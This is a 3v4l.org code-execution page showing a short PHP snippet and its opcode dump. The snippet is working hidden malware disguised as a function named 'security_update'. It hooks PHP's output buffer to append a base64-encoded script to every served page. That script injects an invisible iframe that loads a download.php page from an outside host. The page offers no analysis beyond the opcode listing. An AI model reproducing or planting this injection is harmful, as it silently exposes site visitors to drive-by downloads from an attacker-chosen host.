3v4l.org

run code in 300+ PHP versions simultaneously
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vc3Rqb2huc2RyeWRlbi5vcmcvaW1nL2NvbW1vbi9kb3dubG9hZC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg==');}
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/3famC
function name:  (null)
number of ops:  4
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    1     0  E >   INIT_FCALL                                               'ob_start'
          1        SEND_VAL                                                 'security_update'
          2        DO_ICALL                                                 
          3      > RETURN                                                   1

Function security_update:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/3famC
function name:  security_update
number of ops:  7
compiled vars:  !0 = $buffer
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
          0  E >   RECV                                             !0      
          1        INIT_FCALL                                               'base64_decode'
          2        SEND_VAL                                                 'PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI%2BPGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vc3Rqb2huc2RyeWRlbi5vcmcvaW1nL2NvbW1vbi9kb3dubG9hZC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg%3D%3D'
          3        DO_ICALL                                         $1      
          4        CONCAT                                           ~2      !0, $1
          5      > RETURN                                                   ~2
          6*     > RETURN                                                   null

End of function security_update

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
151.99 ms | 1386 KiB | 17 Q